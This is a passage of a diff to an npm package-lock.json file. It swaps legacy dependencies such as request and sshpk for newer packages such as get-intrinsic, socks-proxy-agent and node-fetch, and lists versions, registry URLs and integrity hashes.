"sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" } }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "requires": { + "once": "^1.4.0" + } }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" }, - "extsprintf": { + "es-errors": { "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "requires": { + "es-errors": "^1.3.0" + } }, - "fast-json-stable-stringify": { + "es-set-tostringtag": { "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" } }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "requires": { - "assert-plus": "^1.0.0" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" } }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" + }, + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } + }, + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" } }, - "http-signature": { + "gopd": { "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" + }, + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" + }, + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "has-symbols": "^1.0.3" } }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" + "hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "requires": { + "function-bind": "^1.1.2" + } }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "requires": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + } }, "isomorphic-ws": { "version": "5.0.0", @@ -1500,25 +1060,10 @@ "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", "requires": {} }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, "jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true + "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==" }, "js-yaml": { "version": "4.1.0", @@ -1529,55 +1074,29 @@ } }, "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" }, "jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "requires": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", "jsep": "^1.4.0" } }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" }, "mime-db": { "version": "1.49.0", @@ -1592,135 +1111,48 @@ "mime-db": "1.49.0" } }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" } }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, "oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true + "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==" + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } }, "openid-client": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, "requires": { "jose": "^5.9.6", "oauth4webapi": "^3.1.1" } }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, "rfc4648": { @@ -1728,265 +1160,113 @@ "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "requires": { - "shebang-regex": "^3.0.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" + }, "stream-buffers": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - 